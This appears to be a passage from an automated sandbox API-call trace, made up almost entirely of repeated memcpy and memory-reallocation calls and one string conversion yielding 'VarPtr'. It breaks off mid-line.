[0114.401] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.401] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.401] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.401] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.402] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.402] CRetailMalloc_Realloc () returned 0xca3a640 [0114.403] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.403] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.403] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.403] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.403] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.403] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.403] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.403] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.407] CRetailMalloc_Realloc () returned 0xc7da5e8 [0114.414] CRetailMalloc_Realloc () returned 0xca709b8 [0114.429] CRetailMalloc_Realloc () returned 0xc91a6b0 [0114.510] memcpy (in: _Dst=0xcb938c8, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.510] memcpy (in: _Dst=0xcb938c8, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.510] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.510] memcpy (in: _Dst=0xcb938d0, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0114.510] memcpy (in: _Dst=0xcb938d0, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0114.511] CRetailMalloc_Alloc () returned 0xc7f6170 [0114.511] CRetailMalloc_Realloc () returned 0xc74cb50 [0114.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10182b42, cbMultiByte=7, lpWideCharStr=0x6f7760, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0114.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10182b42, cbMultiByte=7, lpWideCharStr=0x6f7764, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0114.514] CRetailMalloc_Realloc () returned 0xca24eb0 [0114.514] CRetailMalloc_Realloc () returned 0xc7f5d80 [0114.515] CRetailMalloc_Realloc () returned 0xc97c5c0 [0114.515] CRetailMalloc_Realloc () returned 0xc97c2a8 [0114.515] CRetailMalloc_Realloc () returned 0xc6e3af0 [0114.515] CRetailMalloc_Realloc () returned 0xca65560 [0114.516] memcpy (in: _Dst=0xcb938d0, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0114.516] memcpy (in: _Dst=0xcb938d4, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938d4) returned 0xcb938d4 [0114.516] memcpy (in: _Dst=0xcb938d8, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938d8) returned 0xcb938d8 [0114.516] memcpy (in: _Dst=0xcb938dc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938dc) returned 0xcb938dc [0114.516] memcpy (in: _Dst=0xcb938c8, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.516] memcpy (in: _Dst=0xcb938c8, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.516] memcpy (in: _Dst=0xcb938cc, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938cc) returned 0xcb938cc [0114.516] memcpy (in: _Dst=0xcb938d0, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938d0) returned 0xcb938d0 [0114.516] memcpy (in: _Dst=0xcb938d4, _Src=0x6f791c, _Size=0x4 | out: _Dst=0xcb938d4) returned 0xcb938d4 [0114.516] memcpy (in: _Dst=0xcb938c8, _Src=0x6f78e8, _Size=0x4 | out: _Dst=0xcb938c8) returned 0xcb938c8 [0114.517] memcpy (in: _Dst=0xcaa566d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa566d) returned 0xcaa566d [0114.517] memcpy (in: _Dst=0xcaa567d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa567d) returned 0xcaa567d [0114.517] memcpy (in: _Dst=0xcaa568d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa568d) returned 0xcaa568d [0114.517] memcpy (in: _Dst=0xcaa569d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa569d) returned 0xcaa569d [0114.517] memcpy (in: _Dst=0xcaa56ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56ad) returned 0xcaa56ad [0114.517] memcpy (in: _Dst=0xcaa56bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56bd) returned 0xcaa56bd [0114.517] memcpy (in: _Dst=0xcaa56cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56cd) returned 0xcaa56cd [0114.517] memcpy (in: _Dst=0xcaa56dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56dd) returned 0xcaa56dd [0114.517] memcpy (in: _Dst=0xcaa56ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56ed) returned 0xcaa56ed [0114.517] memcpy (in: _Dst=0xcaa56fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa56fd) returned 0xcaa56fd [0114.517] memcpy (in: _Dst=0xcaa570d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa570d) returned 0xcaa570d [0114.517] memcpy (in: _Dst=0xcaa571d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa571d) returned 0xcaa571d [0114.517] memcpy (in: _Dst=0xcaa572d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa572d) returned 0xcaa572d [0114.517] memcpy (in: _Dst=0xcaa573d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa573d) returned 0xcaa573d [0114.517] memcpy (in: _Dst=0xcaa574d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa574d) returned 0xcaa574d [0114.517] memcpy (in: _Dst=0xcaa575d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa575d) returned 0xcaa575d [0114.517] memcpy (in: _Dst=0xcaa576d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa576d) returned 0xcaa576d [0114.517] memcpy (in: _Dst=0xcaa577d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa577d) returned 0xcaa577d [0114.517] memcpy (in: _Dst=0xcaa578d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa578d) returned 0xcaa578d [0114.517] memcpy (in: _Dst=0xcaa579d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa579d) returned 0xcaa579d [0114.517] memcpy (in: _Dst=0xcaa57ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57ad) returned 0xcaa57ad [0114.517] memcpy (in: _Dst=0xcaa57bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57bd) returned 0xcaa57bd [0114.517] memcpy (in: _Dst=0xcaa57cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57cd) returned 0xcaa57cd [0114.517] memcpy (in: _Dst=0xcaa57dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57dd) returned 0xcaa57dd [0114.517] memcpy (in: _Dst=0xcaa57ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57ed) returned 0xcaa57ed [0114.517] memcpy (in: _Dst=0xcaa57fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa57fd) returned 0xcaa57fd [0114.517] memcpy (in: _Dst=0xcaa580d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa580d) returned 0xcaa580d [0114.517] memcpy (in: _Dst=0xcaa581d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa581d) returned 0xcaa581d [0114.517] memcpy (in: _Dst=0xcaa582d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa582d) returned 0xcaa582d [0114.517] memcpy (in: _Dst=0xcaa583d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa583d) returned 0xcaa583d [0114.517] memcpy (in: _Dst=0xcaa584d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa584d) returned 0xcaa584d [0114.517] memcpy (in: _Dst=0xcaa585d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa585d) returned 0xcaa585d [0114.517] memcpy (in: _Dst=0xcaa586d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa586d) returned 0xcaa586d [0114.517] memcpy (in: _Dst=0xcaa587d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa587d) returned 0xcaa587d [0114.518] memcpy (in: _Dst=0xcaa588d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa588d) returned 0xcaa588d [0114.518] memcpy (in: _Dst=0xcaa589d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa589d) returned 0xcaa589d [0114.518] memcpy (in: _Dst=0xcaa58ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58ad) returned 0xcaa58ad [0114.518] memcpy (in: _Dst=0xcaa58bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58bd) returned 0xcaa58bd [0114.518] memcpy (in: _Dst=0xcaa58cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58cd) returned 0xcaa58cd [0114.518] memcpy (in: _Dst=0xcaa58dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58dd) returned 0xcaa58dd [0114.518] memcpy (in: _Dst=0xcaa58ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58ed) returned 0xcaa58ed [0114.518] memcpy (in: _Dst=0xcaa58fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa58fd) returned 0xcaa58fd [0114.518] memcpy (in: _Dst=0xcaa590d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa590d) returned 0xcaa590d [0114.518] memcpy (in: _Dst=0xcaa591d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa591d) returned 0xcaa591d [0114.518] memcpy (in: _Dst=0xcaa592d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa592d) returned 0xcaa592d [0114.518] memcpy (in: _Dst=0xcaa593d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa593d) returned 0xcaa593d [0114.518] memcpy (in: _Dst=0xcaa594d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa594d) returned 0xcaa594d [0114.518] memcpy (in: _Dst=0xcaa595d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa595d) returned 0xcaa595d [0114.518] memcpy (in: _Dst=0xcaa596d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa596d) returned 0xcaa596d [0114.518] memcpy (in: _Dst=0xcaa597d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa597d) returned 0xcaa597d [0114.518] memcpy (in: _Dst=0xcaa598d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa598d) returned 0xcaa598d [0114.518] memcpy (in: _Dst=0xcaa599d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa599d) returned 0xcaa599d [0114.518] memcpy (in: _Dst=0xcaa59ad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59ad) returned 0xcaa59ad [0114.518] memcpy (in: _Dst=0xcaa59bd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59bd) returned 0xcaa59bd [0114.518] memcpy (in: _Dst=0xcaa59cd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59cd) returned 0xcaa59cd [0114.518] memcpy (in: _Dst=0xcaa59dd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59dd) returned 0xcaa59dd [0114.518] memcpy (in: _Dst=0xcaa59ed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59ed) returned 0xcaa59ed [0114.518] memcpy (in: _Dst=0xcaa59fd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa59fd) returned 0xcaa59fd [0114.518] memcpy (in: _Dst=0xcaa5a0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a0d) returned 0xcaa5a0d [0114.518] memcpy (in: _Dst=0xcaa5a1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a1d) returned 0xcaa5a1d [0114.518] memcpy (in: _Dst=0xcaa5a2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a2d) returned 0xcaa5a2d [0114.518] memcpy (in: _Dst=0xcaa5a3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a3d) returned 0xcaa5a3d [0114.518] memcpy (in: _Dst=0xcaa5a4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a4d) returned 0xcaa5a4d [0114.518] memcpy (in: _Dst=0xcaa5a5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a5d) returned 0xcaa5a5d [0114.518] memcpy (in: _Dst=0xcaa5a6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a6d) returned 0xcaa5a6d [0114.518] memcpy (in: _Dst=0xcaa5a7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a7d) returned 0xcaa5a7d [0114.519] memcpy (in: _Dst=0xcaa5a8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a8d) returned 0xcaa5a8d [0114.519] memcpy (in: _Dst=0xcaa5a9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5a9d) returned 0xcaa5a9d [0114.519] memcpy (in: _Dst=0xcaa5aad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5aad) returned 0xcaa5aad [0114.519] memcpy (in: _Dst=0xcaa5abd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5abd) returned 0xcaa5abd [0114.519] memcpy (in: _Dst=0xcaa5acd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5acd) returned 0xcaa5acd [0114.519] memcpy (in: _Dst=0xcaa5add, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5add) returned 0xcaa5add [0114.519] memcpy (in: _Dst=0xcaa5aed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5aed) returned 0xcaa5aed [0114.519] memcpy (in: _Dst=0xcaa5afd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5afd) returned 0xcaa5afd [0114.519] memcpy (in: _Dst=0xcaa5b0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b0d) returned 0xcaa5b0d [0114.519] memcpy (in: _Dst=0xcaa5b1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b1d) returned 0xcaa5b1d [0114.519] memcpy (in: _Dst=0xcaa5b2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b2d) returned 0xcaa5b2d [0114.519] memcpy (in: _Dst=0xcaa5b3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b3d) returned 0xcaa5b3d [0114.519] memcpy (in: _Dst=0xcaa5b4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b4d) returned 0xcaa5b4d [0114.519] memcpy (in: _Dst=0xcaa5b5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b5d) returned 0xcaa5b5d [0114.519] memcpy (in: _Dst=0xcaa5b6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b6d) returned 0xcaa5b6d [0114.519] memcpy (in: _Dst=0xcaa5b7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b7d) returned 0xcaa5b7d [0114.519] memcpy (in: _Dst=0xcaa5b8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b8d) returned 0xcaa5b8d [0114.519] memcpy (in: _Dst=0xcaa5b9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5b9d) returned 0xcaa5b9d [0114.519] memcpy (in: _Dst=0xcaa5bad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bad) returned 0xcaa5bad [0114.519] memcpy (in: _Dst=0xcaa5bbd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bbd) returned 0xcaa5bbd [0114.519] memcpy (in: _Dst=0xcaa5bcd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bcd) returned 0xcaa5bcd [0114.519] memcpy (in: _Dst=0xcaa5bdd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bdd) returned 0xcaa5bdd [0114.519] memcpy (in: _Dst=0xcaa5bed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bed) returned 0xcaa5bed [0114.519] memcpy (in: _Dst=0xcaa5bfd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5bfd) returned 0xcaa5bfd [0114.519] memcpy (in: _Dst=0xcaa5c0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c0d) returned 0xcaa5c0d [0114.519] memcpy (in: _Dst=0xcaa5c1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c1d) returned 0xcaa5c1d [0114.519] memcpy (in: _Dst=0xcaa5c2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c2d) returned 0xcaa5c2d [0114.519] memcpy (in: _Dst=0xcaa5c3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c3d) returned 0xcaa5c3d [0114.519] memcpy (in: _Dst=0xcaa5c4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c4d) returned 0xcaa5c4d [0114.519] memcpy (in: _Dst=0xcaa5c5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c5d) returned 0xcaa5c5d [0114.520] memcpy (in: _Dst=0xcaa5c6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c6d) returned 0xcaa5c6d [0114.520] memcpy (in: _Dst=0xcaa5c7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c7d) returned 0xcaa5c7d [0114.520] memcpy (in: _Dst=0xcaa5c8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c8d) returned 0xcaa5c8d [0114.520] memcpy (in: _Dst=0xcaa5c9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5c9d) returned 0xcaa5c9d [0114.520] memcpy (in: _Dst=0xcaa5cad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5cad) returned 0xcaa5cad [0114.520] memcpy (in: _Dst=0xcaa5cbd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5cbd) returned 0xcaa5cbd [0114.520] memcpy (in: _Dst=0xcaa5ccd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ccd) returned 0xcaa5ccd [0114.520] memcpy (in: _Dst=0xcaa5cdd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5cdd) returned 0xcaa5cdd [0114.520] memcpy (in: _Dst=0xcaa5ced, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ced) returned 0xcaa5ced [0114.520] memcpy (in: _Dst=0xcaa5cfd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5cfd) returned 0xcaa5cfd [0114.520] memcpy (in: _Dst=0xcaa5d0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d0d) returned 0xcaa5d0d [0114.520] memcpy (in: _Dst=0xcaa5d1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d1d) returned 0xcaa5d1d [0114.520] memcpy (in: _Dst=0xcaa5d2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d2d) returned 0xcaa5d2d [0114.520] memcpy (in: _Dst=0xcaa5d3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d3d) returned 0xcaa5d3d [0114.520] memcpy (in: _Dst=0xcaa5d4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d4d) returned 0xcaa5d4d [0114.520] memcpy (in: _Dst=0xcaa5d5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d5d) returned 0xcaa5d5d [0114.521] memcpy (in: _Dst=0xcaa5d6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d6d) returned 0xcaa5d6d [0114.521] memcpy (in: _Dst=0xcaa5d7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d7d) returned 0xcaa5d7d [0114.521] memcpy (in: _Dst=0xcaa5d8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d8d) returned 0xcaa5d8d [0114.521] memcpy (in: _Dst=0xcaa5d9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5d9d) returned 0xcaa5d9d [0114.521] memcpy (in: _Dst=0xcaa5dad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5dad) returned 0xcaa5dad [0114.521] memcpy (in: _Dst=0xcaa5dbd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5dbd) returned 0xcaa5dbd [0114.521] memcpy (in: _Dst=0xcaa5dcd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5dcd) returned 0xcaa5dcd [0114.521] memcpy (in: _Dst=0xcaa5ddd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ddd) returned 0xcaa5ddd [0114.521] memcpy (in: _Dst=0xcaa5ded, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ded) returned 0xcaa5ded [0114.521] memcpy (in: _Dst=0xcaa5dfd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5dfd) returned 0xcaa5dfd [0114.521] memcpy (in: _Dst=0xcaa5e0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e0d) returned 0xcaa5e0d [0114.521] memcpy (in: _Dst=0xcaa5e1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e1d) returned 0xcaa5e1d [0114.521] memcpy (in: _Dst=0xcaa5e2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e2d) returned 0xcaa5e2d [0114.521] memcpy (in: _Dst=0xcaa5e3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e3d) returned 0xcaa5e3d [0114.521] memcpy (in: _Dst=0xcaa5e4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e4d) returned 0xcaa5e4d [0114.521] memcpy (in: _Dst=0xcaa5e5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e5d) returned 0xcaa5e5d [0114.521] CRetailMalloc_Realloc () returned 0xcaa5660 [0114.521] memcpy (in: _Dst=0xcaa5e6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e6d) returned 0xcaa5e6d [0114.521] memcpy (in: _Dst=0xcaa5e7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e7d) returned 0xcaa5e7d [0114.521] memcpy (in: _Dst=0xcaa5e8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e8d) returned 0xcaa5e8d [0114.523] memcpy (in: _Dst=0xcaa5e9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5e9d) returned 0xcaa5e9d [0114.523] memcpy (in: _Dst=0xcaa5ead, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ead) returned 0xcaa5ead [0114.523] memcpy (in: _Dst=0xcaa5ebd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ebd) returned 0xcaa5ebd [0114.523] memcpy (in: _Dst=0xcaa5ecd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5ecd) returned 0xcaa5ecd [0114.523] memcpy (in: _Dst=0xcaa5edd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5edd) returned 0xcaa5edd [0114.523] memcpy (in: _Dst=0xcaa5eed, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5eed) returned 0xcaa5eed [0114.523] memcpy (in: _Dst=0xcaa5efd, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5efd) returned 0xcaa5efd [0114.523] memcpy (in: _Dst=0xcaa5f0d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f0d) returned 0xcaa5f0d [0114.523] memcpy (in: _Dst=0xcaa5f1d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f1d) returned 0xcaa5f1d [0114.523] memcpy (in: _Dst=0xcaa5f2d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f2d) returned 0xcaa5f2d [0114.523] memcpy (in: _Dst=0xcaa5f3d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f3d) returned 0xcaa5f3d [0114.523] memcpy (in: _Dst=0xcaa5f4d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f4d) returned 0xcaa5f4d [0114.523] memcpy (in: _Dst=0xcaa5f5d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f5d) returned 0xcaa5f5d [0114.523] memcpy (in: _Dst=0xcaa5f6d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f6d) returned 0xcaa5f6d [0114.523] memcpy (in: _Dst=0xcaa5f7d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f7d) returned 0xcaa5f7d [0114.523] memcpy (in: _Dst=0xcaa5f8d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f8d) returned 0xcaa5f8d [0114.523] memcpy (in: _Dst=0xcaa5f9d, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5f9d) returned 0xcaa5f9d [0114.523] memcpy (in: _Dst=0xcaa5fad, _Src=0x6f78e8, _Size=0x1 | out: _Dst=0xcaa5fad) returned 0xcaa5fad [0114.523] memcpy (in: _Dst=0xcaa5fbd, _Src=0x6f78e8, _Size=0x1 | out: 